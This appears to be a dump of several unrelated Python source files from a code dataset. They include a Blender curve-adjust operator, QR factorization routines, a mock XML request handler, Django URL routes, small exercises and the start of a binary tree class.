bl_options = {\"REGISTER\", \"UNDO\", \"BLOCKING\"}\r\n\r\n first_mouse_x: IntProperty()\r\n first_value: FloatProperty()\r\n second_value: IntProperty()\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n return getattr(context.active_object, \"type\", \"\") == \"CURVE\"\r\n\r\n\r\n def invoke(self, context, event):\r\n\r\n self.back_dict = {}\r\n self.active_curve = context.active_object\r\n \r\n if self.active_curve:\r\n self.active_curve.select_set(True)\r\n\r\n self.slected_curves = [c for c in context.selected_objects if c.type == 'CURVE' and c.data.splines]\r\n self.back_objects() \r\n self.master = None\r\n\r\n self.fill_type_3d = [\"FULL\", \"BACK\", \"FRONT\", \"HALF\"]\r\n self.fill_type_2d = [\"NONE\", \"BACK\", \"FRONT\", \"BOTH\"] \r\n self.spline_type = [\"POLY\", \"NURBS\", \"BEZIER\"]\r\n\r\n if not self.active_curve or not self.active_curve.data.splines:\r\n if self.slected_curves:\r\n self.active_curve = self.slected_curves[0]\r\n\r\n else:\r\n\r\n self.active_curve = None\r\n \r\n if self.active_curve:\r\n \r\n if not self.active_curve.data.splines.active:\r\n self.active_curve.data.splines.active = self.active_curve.data.splines[0]\r\n\r\n self.start_fill_mode = self.active_curve.data.fill_mode\r\n self.start_spline_type = self.active_curve.data.splines.active.type\r\n self.spline_type_index = self.spline_type.index(self.start_spline_type) \r\n self.fill_index = self.fill_type_3d.index(self.start_fill_mode) if self.active_curve.data.dimensions == '3D' else self.fill_type_2d.index(self.start_fill_mode)\r\n self.start_show_wire = self.active_curve.show_wire\r\n # Base Systems\r\n self.master = Master(context=context)\r\n self.master.only_use_fast_ui = True\r\n self.base_controls = Base_Modal_Controls(context, event)\r\n self.original_tool_shelf, self.original_n_panel = collapse_3D_view_panels()\r\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_add(self.safe_draw_shader, (context,), 'WINDOW', 'POST_PIXEL')\r\n\r\n\r\n context.window_manager.modal_handler_add(self)\r\n infobar.initiate(self)\r\n return {\"RUNNING_MODAL\"}\r\n\r\n else:\r\n self.report({'WARNING'}, \"No valid curve objects in selection, could not finish\")\r\n return {'CANCELLED'}\r\n\r\n\r\n def modal(self, context, event):\r\n\r\n # Base Systems\r\n 
self.master.receive_event(event=event)\r\n self.base_controls.update(context, event)\r\n mouse_warp(context, event)\r\n\r\n if self.base_controls.pass_through:\r\n return {'PASS_THROUGH'}\r\n\r\n if self.base_controls.mouse:\r\n for curve in self.slected_curves:\r\n curve.data.bevel_depth += self.base_controls.mouse\r\n\r\n if self.base_controls.scroll:\r\n #bevel res\r\n if event.ctrl :\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u += self.base_controls.scroll\r\n curve.data.render_resolution_u = curve.data.resolution_u\r\n self.report({'INFO'}, F'Curve Resolution : {self.active_curve.data.resolution_u}')\r\n #curve order\r\n elif event.shift :\r\n for curve in self.slected_curves:\r\n self.splines_add(curve.data.splines, \"order_u\", self.base_controls.scroll)# spline.order_u += self.base_controls.scroll\r\n self.report({'INFO'}, F'Spline order:{self.active_curve.data.splines.active.order_u }')\r\n #bevel res\r\n else:\r\n for curve in self.slected_curves:\r\n curve.data.bevel_resolution += self.base_controls.scroll\r\n self.report({'INFO'}, F'Curve Bevel Resolution : {self.active_curve.data.bevel_resolution}')\r\n\r\n if event.type == 'S' and event.value == 'PRESS':\r\n\r\n if not event.shift:\r\n for curve in self.slected_curves:\r\n for spline in curve.data.splines:\r\n spline.use_smooth = not spline.use_smooth\r\n smooth = self.active_curve.data.splines.active.use_smooth\r\n shade ={True:\"Smooth\", False:\"Flat\"}\r\n self.report({'INFO'}, F'Shade {shade[smooth]}')\r\n else:\r\n use_smooth = self.active_curve.data.splines.active.use_smooth\r\n for curve in self.slected_curves:\r\n self.splines_set(curve.data.splines, \"use_smooth\", use_smooth) \r\n self.report({'INFO'}, F'Shading Synced')\r\n\r\n edgeSplit = [mod.name for mod in self.active_curve.modifiers if mod.type == 'EDGE_SPLIT']\r\n\r\n if event.type == 'C' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n for spline in curve.data.splines:\r\n length_limit = False\r\n if spline.type == 'BEZIER'and len(spline.bezier_points)>1 :\r\n length_limit = True\r\n elif len(spline.points) >2:\r\n length_limit = True\r\n spline.use_cyclic_u = not spline.use_cyclic_u if length_limit else False\r\n self.report({'INFO'}, F'Toggled Cyclic')\r\n\r\n if event.type == 'W' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.show_wire = not curve.show_wire\r\n wire ={True:\"ON\", False:\"OFF\"}\r\n self.report({'INFO'}, F'Wireframe:{wire[self.active_curve.show_wire]}')\r\n\r\n if event.type == 'F' and event.value == 'PRESS':\r\n self.fill_index= self.fill_index+1 if self.fill_index<3 else 0\r\n for curve in self.slected_curves:\r\n curve.data.fill_mode = self.fill_type_3d[self.fill_index] if curve.data.dimensions == '3D' else self.fill_type_2d[self.fill_index]\r\n self.report({'INFO'}, F'Fill Mode:{self.active_curve.data.fill_mode}')\r\n\r\n if event.type == 'V' and event.value == 'PRESS':\r\n self.spline_type_index = self.spline_type_index+1 if self.spline_type_index<2 else 0\r\n self.active_curve.data.splines.active.type = self.spline_type[self.spline_type_index]\r\n if self.active_curve.data.splines.active.type != 'BEZIER' and self.spline_type_index == 2:\r\n self.spline_type_index =0\r\n for curve in self.slected_curves:\r\n for spline in curve.data.splines:\r\n spline.type = self.spline_type[self.spline_type_index]\r\n self.spline_type[self.spline_type_index]\r\n curve.data.splines.update()\r\n if get_preferences().ui.Hops_extra_info:\r\n 
bpy.ops.hops.display_notification(info=F'Spline Type : {self.active_curve.data.splines.active.type}' )\r\n self.report({'INFO'}, F'Spline type:{self.active_curve.data.splines.active.type}')\r\n\r\n if event.type == 'ONE' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 6\r\n curve.data.render_resolution_u = 12\r\n curve.data.bevel_resolution = 6\r\n curve.data.fill_mode = 'FULL'\r\n self.report({'INFO'}, F'Resolution : 6')\r\n\r\n for name in edgeSplit:\r\n bpy.ops.object.modifier_remove(modifier=name)\r\n\r\n if event.type == 'TWO' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 64\r\n curve.data.render_resolution_u = 64\r\n curve.data.bevel_resolution = 16\r\n curve.data.fill_mode = 'FULL'\r\n self.report({'INFO'}, F'Resolution : 64')\r\n\r\n for name in edgeSplit:\r\n bpy.ops.object.modifier_remove(modifier=name)\r\n\r\n if event.type == 'THREE' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 64\r\n curve.data.render_resolution_u = 64\r\n curve.data.bevel_resolution = 0\r\n curve.data.fill_mode = 'FULL'\r\n if not len(edgeSplit):\r\n bpy.ops.object.modifier_add(type='EDGE_SPLIT')\r\n self.active_curve.modifiers[\"EdgeSplit\"].split_angle = math.radians(60)\r\n self.report({'INFO'}, F'Resolution : 64 / Edge Split Added')\r\n\r\n if self.base_controls.tilde and event.shift == True:\r\n bpy.context.space_data.overlay.show_overlays = not bpy.context.space_data.overlay.show_overlays\r\n\r\n if self.base_controls.confirm:\r\n if not self.start_show_wire:\r\n for curve in self.slected_curves:\r\n curve.show_wire = False\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'FINISHED'}\r\n\r\n if event.type == 'X' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.bevel_depth = 0.0\r\n self.report({'INFO'}, F'Depth Set To 0 - exit')\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'FINISHED'}\r\n\r\n if self.base_controls.cancel:\r\n #self.reset_object()\r\n self.restore_objects()\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'CANCELLED'}\r\n\r\n self.draw_master(context=context)\r\n context.area.tag_redraw()\r\n return {\"RUNNING_MODAL\"}\r\n\r\n\r\n # def reset_object(self):\r\n # self.active_curve.show_wire = self.start_show_wire\r\n # self.active_curve.data.fill_mode = self.start_fill_mode\r\n # self.active_curve.data.bevel_depth = self.start_bevel_depth\r\n # for spline in self.active_curve.data.splines:\r\n # spline.type = self.start_spline_type\r\n # spline.order_u =self.start_order_u\r\n\r\n def back_objects(self):\r\n \r\n for curve in self.slected_curves:\r\n back = {}\r\n back[\"show_wire\"]= curve.show_wire\r\n back[\"fill_mode\"]= curve.data.fill_mode\r\n back[\"bevel_depth\"]= curve.data.bevel_depth\r\n back[\"bevel_resolution\"]= curve.data.bevel_resolution\r\n back[\"resolution_u\"] = curve.data.resolution_u \r\n back[\"render_resolution_u\"] = curve.data.render_resolution_u\r\n back[\"spline_type\"] = [spline.type for spline in curve.data.splines]\r\n back[\"spline_order_u\"] = [spline.order_u for spline in curve.data.splines]\r\n back[\"use_cyclic_u\"] = 
[spline.use_cyclic_u for spline in curve.data.splines]\r\n self.back_dict.update({curve:back})\r\n\r\n def restore_objects(self):\r\n \r\n for curve, back in self.back_dict.items():\r\n curve.show_wire = back[\"show_wire\"]\r\n curve.data.fill_mode = back[\"fill_mode\"]\r\n curve.data.bevel_depth = back[\"bevel_depth\"]\r\n curve.data.bevel_resolution = back[\"bevel_resolution\"]\r\n curve.data.resolution_u = back[\"resolution_u\"]\r\n curve.data.render_resolution_u = back[\"render_resolution_u\"]\r\n for spline , spline_type, spline_order, use_cyclic_u in zip(\r\n curve.data.splines, back[\"spline_type\"], back[\"spline_order_u\"], back[\"use_cyclic_u\"] ):\r\n spline.type = spline_type\r\n spline.order_u = spline_order\r\n spline.use_cyclic_u = use_cyclic_u\r\n\r\n\r\n def draw_master(self, context):\r\n\r\n # Start\r\n self.master.setup()\r\n\r\n\r\n ########################\r\n # Fast UI\r\n ########################\r\n\r\n\r\n if self.master.should_build_fast_ui():\r\n\r\n # Main\r\n win_list = []\r\n if get_preferences().ui.Hops_modal_fast_ui_loc_options != 1: #Fast Floating\r\n win_list.append(\"{:.2f}\".format(self.active_curve.data.bevel_depth))\r\n win_list.append(\"{:.0f}\".format(self.active_curve.data.render_resolution_u))\r\n win_list.append(\"{:.0f}\".format(self.active_curve.data.bevel_resolution))\r\n else:\r\n win_list.append(\"Curve Adjust\")\r\n win_list.append(self.active_curve.data.splines.active.type)\r\n win_list.append(F\"Fill type: {self.active_curve.data.fill_mode}\")\r\n win_list.append(\"Width - {:.3f}\".format(self.active_curve.data.bevel_depth))\r\n win_list.append(\"Segments (ctrl) - {:.0f}\".format(self.active_curve.data.render_resolution_u))\r\n win_list.append(\"Profile:{:.0f}\".format(self.active_curve.data.bevel_resolution))\r\n win_list.append(\"Order:{:.0f}\".format(self.active_curve.data.splines.active.order_u))\r\n\r\n # Help\r\n help_items = {\"GLOBAL\" : [], \"STANDARD\" : []}\r\n\r\n help_items[\"GLOBAL\"] = [\r\n (\"M\", \"Toggle mods list\"),\r\n (\"H\", \"Toggle help\"),\r\n (\"~\", \"Toggle UI Display Type\"),\r\n (\"O\", \"Toggle viewport rendering\")]\r\n\r\n help_items[\"STANDARD\"] = [\r\n (\"X\", \"Set Depth to 0 and end\"),\r\n (\"C\", \"Toggle cyclic\"),\r\n (\"V\", \"Cycle spline type\"),\r\n (\"SHIFT+S\", \"Sync spline shading\"),\r\n (\"S\", \"Toggle smooth shading\"),\r\n (\"W\", \"Toggle Wireframe\"),\r\n (\"F\", \"Cycle Fill Mode\"),\r\n (\"3\", \"Set profile 64 x 4 (Box)\"),\r\n (\"2\", \"Set profile 64 x 16\"),\r\n (\"1\", \"Set profile 12 x 6\"),\r\n (\"Shift + Scroll\", \"Set order\"),\r\n (\"Ctrl + Scroll\", \"Set segments\"),\r\n (\"Scroll\", \"Set resolution\"),\r\n (\"Mouse\", \"Adjust Bevel Depth\")]\r\n\r\n # Mods\r\n mods_list = get_mods_list(mods=bpy.context.active_object.modifiers)\r\n\r\n self.master.receive_fast_ui(win_list=win_list, help_list=help_items, image=\"Curve\", mods_list=mods_list)\r\n\r\n # Finished\r\n self.master.finished()\r\n\r\n ####################################################\r\n # CURSOR WARP\r\n ####################################################\r\n\r\n def safe_draw_shader(self, context):\r\n method_handler(self.draw_shader,\r\n arguments = (context,),\r\n identifier = 'UI Framework',\r\n exit_method = self.remove_shader)\r\n\r\n\r\n def remove_shader(self):\r\n '''Remove shader handle.'''\r\n\r\n if self.draw_handle:\r\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_remove(self.draw_handle, \"WINDOW\")\r\n\r\n\r\n def draw_shader(self, context):\r\n '''Draw shader 
handle.'''\r\n\r\n draw_modal_frame(context)\r\n\r\n\r\n def splines_set (self, splines=[], attr = \"\", val = None ):\r\n for spline in splines:\r\n setattr(spline, attr, val )\r\n \r\n def splines_add (self, splines=[], attr = \"\", val = None ):\r\n for spline in splines:\r\n current = getattr(spline, attr)\r\n setattr(spline, attr, current+val )","sub_path":"operators/modals/adjust_curve.py","file_name":"adjust_curve.py","file_ext":"py","file_size_in_byte":16453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"35804456","text":"#!/usr/bin/env python\n\nimport sys, socket\nimport logging\nimport argparse\n\nfrom m3_common import m3_common, goc_programmer\n\nm3_common.configure_root_logger()\nlogger = logging.getLogger(__name__)\n\nclass mbus_message(goc_programmer):\n TITLE = \"GOC MBus generator\"\n MSG_TYPE = 'b+'\n\n def parse_args(self):\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-g', '--goc-speed',\n help=\"GOC Slow Speed in Hz. The fast speed will be 8x faster.\"\\\n \" Defaults to \" + str(self.SLOW_FREQ_IN_HZ) + \" Hz.\",\n default=self.SLOW_FREQ_IN_HZ)\n self.parser.add_argument(\"SERIAL\", help=\"Path to ICE serial device\", nargs='?')\n self.args = self.parser.parse_args()\n if self.args.SERIAL is None:\n self.serial_path = self.guess_serial()\n else:\n self.serial_path = self.args.SERIAL\n self.SLOW_FREQ_IN_HZ = float(self.args.goc_speed)\n\n def read_binfile(self):\n pass\n\nm = mbus_message()\nm.dont_do_default(\"Run power-on sequence\", m.power_on)\nm.dont_do_default(\"Reset M3\", m.reset_m3)\nlogger.info(\"** Setting ICE MBus controller to slave mode\")\nm.ice.mbus_set_master_onoff(False)\nm.set_slow_frequency()\nm.wake_chip()\nm.set_fast_frequency()\nmessage = m.build_injection_message(hexencoded_data=\"a512345678\")\nm.send_goc_message(message)\n\nlogger.info(\"\")\nlogger.info(\"Message Sent.\")\nlogger.info(\"\")\n\n","sub_path":"platforms/m3/programming/goc_generate_mbus_message.py","file_name":"goc_generate_mbus_message.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"561354651","text":"\"\"\"\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nNote: Given n will be a positive integer.\n\nExample 1:\n\nInput: 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 
2 steps + 1 step\n\"\"\"\n\n# This is fibonacci series because f(n)=f(n-1)+f(n-2)\nclass Solution(object):\n def climbStairs(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n <= 2:\n return n\n\n return self.climbStairs(n-1) + self.climbStairs(n-2)\n\n def climbStairs2(selfs, n):\n if n == 0:\n return 0\n if n <= 2:\n return n\n f = [0 for i in range(n + 1)]\n f[0], f[1], f[2] = 1, 1, 2\n for i in range(3,n+1):\n f[i] = f[i-1] + f[i-2]\n return f[n]\n\n # Same as method 2 but just using int instead of list\n def climbStairs3(self, n):\n if n == 1:\n return 1\n a, b = 1, 2\n for i in range(2, n):\n tmp = b\n b = a + b\n a = tmp\n return b\n\n # using fibonacci formula from wiki\n def climbStairs4(self, n):\n n += 1\n root5 = 5 ** 0.5\n phi = (1 + root5) / 2\n phi2 = (1 - root5) / 2\n return int(1 / root5 * (phi**n - phi2**n))\n\nprint(Solution().climbStairs4(3))","sub_path":"70ClimbStair.py","file_name":"70ClimbStair.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648420415","text":"import numpy as np\nfrom numpy.linalg import norm\n\n\ndef classical_gram_schmidt_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the classical Gram-Schmidt method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n r = np.zeros((n, n))\n q = np.zeros((m, n))\n\n for j in range(n):\n v = a[:, j]\n for i in range(j):\n r[i, j] = q[:, i].T@a[:, j]\n v = v - r[i, j]*q[:, i]\n r[j, j] = norm(v)\n q[:, j] = v/r[j, j]\n return q, r\n\n\ndef modified_gram_schmidt_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the modified Gram-Schmidt method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n q = np.zeros((m, n))\n r = np.zeros((n, n))\n v = a.astype(float)\n\n for i in range(n):\n r[i, i] = norm(v[:, i])\n q[:, i] = v[:, i]/r[i, i]\n for j in range(i+1, n):\n r[i, j] = q[:, i].T@v[:, j]\n v[:, j] = v[:, j] - r[i, j]*q[:, i]\n\n return q, r\n\n\ndef householder_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the Householder transform based method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n q_t = np.identity(m)\n r = a.astype(float)\n\n for k in range(n):\n v = np.sign(r[k, k])*norm(r[k:, k])*np.identity(m - k)[0] + r[k:, k]\n v = v/norm(v)\n for i in range(k, n):\n r[k:, i] = r[k:, i] - 2*v*(v.T@r[k:, i])\n\n # construct Q* using Algorithm 10.3\n for i in range(m):\n q_t[k:, i] = q_t[k:, i] - 2*v*(v.T@q_t[k:, i])\n\n return q_t.T, r\n\n\ndef eval_qr(a):\n \"\"\"\n Calculates the QR 
decomposition A=QR using the 3 different implementations\n as well as the Numpy method and evaluates the results in the way the\n assignment asks for.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n \"\"\"\n cs_q, cs_r = classical_gram_schmidt_qr(a)\n ms_q, ms_r = modified_gram_schmidt_qr(a)\n h_q, h_r = householder_qr(a)\n np_q, np_r = np.linalg.qr(a)\n\n # check correctness:\n print(\"Check for correctness:\")\n print(\"Classical Gram-Schmidt: ||QR - A|| =\",\n norm(cs_q@cs_r - a))\n print(\"Modified Gram-Scmidt: ||QR - A|| =\",\n norm(ms_q@ms_r - a))\n print(\"Householder Transform based: ||QR - A|| =\",\n norm(h_q@h_r - a))\n print(\"Numpy: ||QR - A|| =\",\n norm(np_q@np_r - a))\n\n # check orthogonality\n print('\\nCheck orthogonality')\n print(\"Classical Gram-Schmidt: ||Q*Q - I|| =\",\n norm(cs_q.T@cs_q - np.identity(cs_q.shape[1])))\n print(\"Modified Gram-Scmidt: ||Q*Q - I|| =\",\n norm(ms_q.T@ms_q - np.identity(ms_q.shape[1])))\n print(\"Householder Transform based: ||Q*Q - I|| =\",\n norm(h_q.T@h_q - np.identity(h_q.shape[1])))\n print(\"Numpy: ||Q*Q - I|| =\",\n norm(np_q.T@np_q - np.identity(np_q.shape[1])))\n\n\nif __name__ == \"__main__\":\n # create the example matrices\n Z = np.array([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 7],\n [4, 2, 3],\n [4, 2, 2]])\n A = np.array([[0.7, 0.70711],\n [0.70001, 0.70711]])\n\n # run the evaluation for both cases\n print('Case 1:\\n-------')\n eval_qr(Z)\n print('\\nCase 2:\\n-------')\n eval_qr(A)\n","sub_path":"04/code/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602504912","text":"from Felzenswalb_Huttenlocher_segmentation_v2 import FHSegmentation\nimport imageio\n\ntest_image = imageio.imread('testing/Untitled.png')\n\ndef ConstructMinimalInternalDifference(k):\n def MinimalInternalDifference(cluster1, cluster2, attribute1, attribute2):\n return min(attribute1 + (k / len(cluster1)), attribute2 + (k / len(cluster2)))\n\n return MinimalInternalDifference;\n \n\ndef MaxEdgeWeightInMinimalSpanningTree(nodes, graph):\n min_tree_node_set = [nodes[0]]\n min_tree_edge_set = []\n edge_set = graph.GetEdges(nodes[0]).items()\n while (len(min_tree_node_set) < len(nodes)):\n edge_set = sorted(edge_set, key=lambda k, v: v.GetWeight())\n while len(edge_set) > 0:\n if edge_set[0][0][1] not in min_tree_node_set:\n min_tree_node_set.append(edge_set[0][0][1])\n min_tree_edge_set.append(edge_set[0][1])\n edge_set.extend(graph.GetEdges(edge_set[0][0][1]).items)\n edge_set.pop(0)\n break\n else:\n edge_set.pop(0)\n \n return 0 if len(nodes) == 1 else max(map(lambda x: x.GetWeight(), min_tree_edge_set))\n\ndef EdgeWeight(node1, node2):\n return sum(map(lambda x: int(x[0]) * int(x[1]), zip(node1, node2)))\n\nprint(\"Initializing...\")\nFH = FHSegmentation(\n test_image,\n ConstructMinimalInternalDifference(10),\n MaxEdgeWeightInMinimalSpanningTree,\n EdgeWeight,\n True);\nprint(\"Starting to generate graph...\")\nFH.generate_graph_from_input_()\nprint(\"Generating partition...\")\nFH.generate_partition_()\nprint(\"Done!\")\n","sub_path":"clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461604762","text":"import csv # module csv built-in\n\ncityNameIndex = 8\nn = 0\n\nwith open(\"files/cities.csv\", \"r\") as csvFile:\n rows = csv.reader(csvFile, delimiter=\",\")\n 
rows2 = [1,5,6]\n for r in rows:\n cityName = r[8].strip().strip(\"\\\"\")\n if cityName.startswith(\"San\"):\n n += 1\n\nprint(\"Nombre de villes trouvées: %d\" % n)","sub_path":"python/csvDemo2.py","file_name":"csvDemo2.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"53611202","text":"import tornado\nfrom lxml import etree\nfrom app.handlers.request_handler import AbstractRequestHandler\nfrom app.messages.xml_parser import xml_to_dict\nfrom app.messages.xml_render import render\nimport os\nfrom os import listdir, path\nimport re\n\nfrom app.utils.collections import navigate\n\n\nclass TfHandler(AbstractRequestHandler):\n\n @staticmethod\n def filter_by_location(origin, destination):\n compare_location = lambda location: location[\"Origin\"][\"Code\"] == \\\n origin and location[\"Destination\"][\"Code\"]== destination\n\n # Returns a function expecting request as a param\n return lambda request : navigate(request,\n \"CommandList.StartRouting.RouterList.Router.RequestedLocations\",\n compare_location)\n @staticmethod\n def filter_by(path, val):\n return lambda request: navigate(request, path, lambda x: x == val)\n\n @staticmethod\n def filter_by_routing_id(routing_id):\n return TfHandler.filter_by(\"CommandList.*.RoutingId\", routing_id)\n\n def parse_mock_files(base):\n dir = os.path.dirname(__file__)\n p = path.join(dir, \"../..\", base)\n\n files = {}\n\n for file in listdir(p):\n print(file)\n try:\n full_path = path.join(p, file)\n files[full_path] = xml_to_dict(open(full_path).read())\n except Exception as e:\n print(\"Error parsing file {}\".format(file))\n raise e\n\n return files\n\n files = parse_mock_files(\"messages/tf\")\n\n def both(f1, f2):\n return lambda x : f1(x) and f2(x)\n\n async def on_request(self, parsed_request):\n\n command_list = parsed_request[\"CommandList\"]\n\n method = list(command_list.keys())[0]\n\n if method == \"StartRouting\":\n (origin, destination) = self.parse_itinerary(parsed_request)\n template = self.find_template(name=\"StartRouting\",\n query=TfHandler.filter_by_location(origin,\n destination))\n response = render(template, request=parsed_request)\n\n elif method == \"CheckRouting\":\n\n routing_id = navigate(\n parsed_request, \"CommandList.CheckRouting.RoutingId\")[0]\n\n template = self.find_template(name=\"CheckRouting\",\n query=TfHandler.filter_by_routing_id(\n routing_id))\n\n response = render(template,\n request=parsed_request)\n elif method == \"ProcessDetails\":\n\n outward_id = navigate(\n parsed_request, \"CommandList.*.RoutingId\")[0]\n\n routing_id = navigate(\n parsed_request, \"CommandList.*.RoutingId\")[0]\n\n template = self.find_template(name=\"ProcessDetails\",\n query=TfHandler.both(\n TfHandler.filter_by(\n \"CommandList.*.RoutingId\",\n routing_id),\n TfHandler.filter_by(\n \"CommandList.*.RoutingId\",\n outward_id)\n ))\n\n response = render(template,\n request=parsed_request)\n\n elif method == \"ProcessTerms\":\n response = render(\"tf/BCN-MAD-ProcessTermsResponse.xml\",\n request=parsed_request)\n elif method == \"CheckBooking\":\n response = render(\"tf/BCN-MAD-CheckBookingResponse.xml\",\n request=parsed_request)\n else:\n msg = \"Cannot find method {}\".format(method)\n raise tornado.web.HTTPError(reason=msg, log_message=msg,\n status_code=404)\n\n print(\"Returning {}\".format(method))\n self.set_header(\"Content-Type\", \"text/xml\")\n self.write(response)\n\n def parse_itinerary(self, parsed_request):\n origin 
= parsed_request['CommandList']['StartRouting']['Origin']\n destination = parsed_request['CommandList']['StartRouting'][\n 'Destination']\n\n return (origin['Descriptor'], destination['Descriptor'])\n\n def find_template(self, **kwargs):\n\n start = TfHandler.files.items()\n candidates = start\n\n if kwargs.get('name'):\n expr = \"{}\".format(kwargs.get('name'))\n candidates = [file for file in start if re.search(expr, file[0])]\n\n if kwargs.get('query'):\n query = kwargs.get('query')\n candidates = [candidate for candidate in candidates if\n query(candidate[1])]\n\n assert len(candidates) == 1, \"Candidates expected to be 1, found {}\".format(candidates)\n\n return candidates[0][0]\n\n\n\n\n","sub_path":"app/handlers/tf/tf_handler.py","file_name":"tf_handler.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"235521487","text":"class Parking:\n def __init__(self):\n self.__cars = set()\n\n def process_car(self, direction, car):\n if direction == 'IN':\n self.__cars.add(car)\n elif direction == 'OUT' and car in self.__cars:\n self.__cars.remove(car)\n\n def print_status(self):\n if self.__cars:\n print('\\n'.join([reg_num for reg_num in self.__cars]))\n else:\n print(\"Parking Lot is Empty\")\n\nparking = Parking()\n\nn = int(input())\n\nfor _ in range(n):\n direction, reg_num = input().split(', ')\n parking.process_car(direction, reg_num)\nparking.print_status()","sub_path":"02.Tuples_and_Sets/4.1.Parking_lot-with_classes.py","file_name":"4.1.Parking_lot-with_classes.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157236447","text":"# Steps\r\n# Create your own Menu Choices\r\n# Take the Customer Order along with Quantity of each item\r\n# Customer should \r\n# have the choice of ordering more than 1 dish.\r\n# Print the Final Bill for the customer\r\nrows=int(input(\"Enter number of rows: \"))\r\nfor i in range(rows):\r\n for j in range(i+1):\r\n print('*',end =\"\")\r\n print(\"\\n\")","sub_path":"dictannaryhomework.py","file_name":"dictannaryhomework.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"606032583","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import BlogView,IndividualView,NewView,editview,deleteview\n\nurlpatterns = [\n path('',BlogView.as_view(),name=\"home\"),\n path('individual//',IndividualView.as_view(),name=\"individual\"),\n path ('add/',NewView.as_view(),name=\"add\"),\n path('edit/',editview.as_view(),name='edit'),\n path('delete/',deleteview.as_view(),name='delete'),\n path('accounts/',include('django.contrib.auth.urls'),name=\"login\"),\n \n]\n","sub_path":"blog_app chap 5-10/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"105607570","text":"#trees/binarytree.py\nclass BinaryTree(object):\n '''\n Binary tree implementation.\n '''\n class _Node:\n '''\n None public class storing node data.\n '''\n __slot__ = '_element', '_parent', '_left', '_right'\n\n def __init__(self, element, parent = None, left = None, right = None):\n self._element = element\n self._parent = parent\n self._left = left\n self._right = right\n\n def __init__(self):\n self._root = None\n self._size = 0\n\n def 
